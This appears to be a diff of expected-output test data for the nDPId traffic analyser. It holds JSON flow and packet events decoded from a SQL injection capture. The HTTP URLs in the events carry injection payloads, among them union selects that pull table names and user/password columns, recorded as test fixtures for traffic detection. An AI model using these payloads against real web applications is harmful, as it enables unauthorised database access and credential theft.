{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348467295,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348467295,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NrBAAD4GjyCsEAABwKgKMo1sAFAXzJbWAAAAAKACchCBAAAAAgQFtAQCCAoBPqBmAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWwuedQjF8yW16AScSAJgQAAAgQFtAQCCAoD6HHZAT6gZgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499348467296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348467296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NrFAAD4GjyesEAABwKgKMo1sAFAXzJbXLnnUJIAQAOWoiAAAAQEICgE+oGYD6HHZ"} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348480992,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348480992,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IqhAAD4GoyisEAABwKgKMo1uAFBrxY9uAAAAAKACchAnDQAAAgQFtAQCCAoBPq3GAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjW5ct+zHa8WPb6AScSBbSwAAAgQFtAQCCAoD6H85AT6txgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499348480993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348480993,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IqlAAD4Goy+sEAABwKgKMo1uAFBrxY9vXLfsyIAQAOX6UQAAAQEICgE+rccD6H85"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348494345,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348494345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SndAAD4Ge1msEAABwKgKMo1wAFAblvCmAAAAAKACchAI9wAAAgQFtAQCCAoBPrrRAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXBGdqbdG5bwp6AScSCMVgAAAgQFtAQCCAoD6IxDAT660QEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499348494346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348494346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnhAAD4Ge2CsEAABwKgKMo1wAFAblvCnRnam3oAQAOUrXgAAAQEICgE+utED6IxD"} -01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348506489,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348506489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMo1yAFDHw0SlAAAAAKACchD87AAAAgQFtAQCCAoBPsatAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXIW0CP4x8NEpqAScSAm\/AAAAgQFtAQCCAoD6JgfAT7GrQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499348506490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348506490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMo1yAFDHw0SmFtAj+YAQAOXGAwAAAQEICgE+xq0D6Jgf"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348514064,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348514064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tHhAAD4GEVisEAABwKgKMo10AFC7kHpqAAAAAKACchDL8wAAAgQFtAQCCAoBPs4SAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXSy4nMxu5B6a6AScSADUQAAAgQFtAQCCAoD6J+FAT7OEgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499348514065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348514065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tHlAAD4GEV+sEAABwKgKMo10AFC7kHprsuJzMoAQAOWiVwAAAQEICgE+zhMD6J+F"} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348407419,"flow_last_seen":1499348407419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348407419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499348407419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84aRAAD4G5CusEAABwKgKMo1kAFAWk4RJAAAAAKACchDPRwAAAgQFtAQCCAoBPmXtAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499348407419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWS7EzBkFpOESqAScSCpZgAAAgQFtAQCCAoD6DdgAT5l7QEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499348407420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348407420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04aVAAD4G5DKsEAABwKgKMo1kAFAWk4RKuxMwZYAQAOVIbgAAAQEICgE+Ze0D6Ddg"} +00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 